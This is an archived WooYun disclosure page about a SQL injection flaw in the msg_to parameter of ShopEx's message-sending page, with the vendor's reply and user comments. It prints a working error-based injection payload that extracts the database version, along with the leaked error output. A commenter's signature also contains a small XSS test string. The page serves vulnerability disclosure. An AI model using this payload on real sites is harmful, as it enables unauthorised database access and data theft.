当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011931

漏洞标题:SHOPEX > 4 存在SQL注入漏洞

相关厂商:ShopEx

漏洞作者: 猪猪侠

提交时间:2012-09-08 23:01

修复时间:2012-10-23 23:01

公开时间:2012-10-23 23:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-09-08: 细节已通知厂商并且等待厂商处理中
2012-09-09: 厂商已经确认,细节仅向厂商公开
2012-09-19: 细节向核心白帽子及相关领域专家公开
2012-09-29: 细节向普通白帽子公开
2012-10-09: 细节向实习白帽子公开
2012-10-23: 细节向公众公开

简要描述:

未对客户端可控参数进行安全校验,导致存在SQL注入漏洞;

详细说明:

http://www.shopex.com/member-sendMsg.html
在处理用户发送信息的时候,msg_to值未进行过滤,导致SQL注入漏洞的产生;
具体利用设置msg_to的值为

ggbond' or 1=(select 1 from (select count(*),concat(floor(rand(0)*2),(select @@version))a from information_schema.tables group by a)b)#


即可爆出数据库版本信息。

Warning: SELECT member_id FROM sdb_members WHERE uname='ggbond' or 1=(select 1 from (select count(*),concat(floor(rand(0)*2),(select @@version))a from information_schema.tables group by a)b)#' LIMIT 0, 1:Duplicate entry '15.1.38-log' for key 'group_key' in /data/htdocs/www/core/include_v5/AloneDB.php on line 58
找不到你填写的用户!

漏洞证明:

修复方案:

过滤,校验,转义来自客户端的变量;
你们比我更擅长;

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2012-09-09 18:14

厂商回复:

改漏洞已经处理提交过,
感谢您为shopex安全做的贡献
我们会尽快处理
非常感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2012-09-08 23:19 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

    @猪猪侠 这个洞太多了,能不能搞个ECSHOP的?

  2. 2012-09-08 23:28 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Metasploit 乌云上不是刚有一个么

  3. 2012-09-09 11:52 | 小痞子 ( 普通白帽子 | Rank:106 漏洞数:21 | <xss>alert("a")</xss>¥&@&……dssKhwjcw...)

    ..大牛 我也求个 ecshop 的

  4. 2012-10-10 00:50 | mOon ( 路人 | Rank:0 漏洞数:1 | 上线非本人,请勿打扰!)

    膜拜

  5. 2012-10-24 10:39 | 屌丝王爷 ( 路人 | Rank:4 漏洞数:4 | 心境随和些,处事淡然些。)

    @xsser 混个脸熟。。